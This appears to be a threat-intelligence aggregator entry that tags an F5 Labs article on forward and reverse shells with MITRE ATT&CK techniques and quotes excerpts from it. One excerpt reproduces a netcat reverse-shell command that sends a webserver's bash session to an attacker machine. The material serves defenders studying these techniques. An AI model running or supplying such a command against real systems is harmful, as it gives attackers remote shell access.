TTPwire Vol. 1 · MITRE ATT&CK·Tagged

F5 Labs

Forward and Reverse Shells

2023-09-15

ATT&CK techniques detected

3 predictions
T1505.003 Web Shell
98%
“forward and reverse shells introduction once attackers have gained a foothold, perhaps by exploiting a remote code execution (rce) vulnerability, leveraging a file upload, or some other tactic to gain execution on the target, they may end up using a web shell, as we described i…”
T1059.004 Unix Shell
91%
“tools they can use to create reverse shells, and it’s likely that at least one of these will be present on the target. reverse shells can be created with the following tools, among many others (this list is not exhaustive): - bash - sh (this will be present on every linux s…”
T1059.004 Unix Shell
49%
“target “nc 192.168.0.2 80 -e /bin/bash” the nc command will create a network connection from the webserver to the attacker machine and then connect the linux shell “bash” to this network connection. on the attacker machine, the listener on the attacker machine now is c…”

Summary

Learn how attackers use server-initiated connections and other clever tricks to deliver shells to attackers, circumventing inbound firewalls and access controls.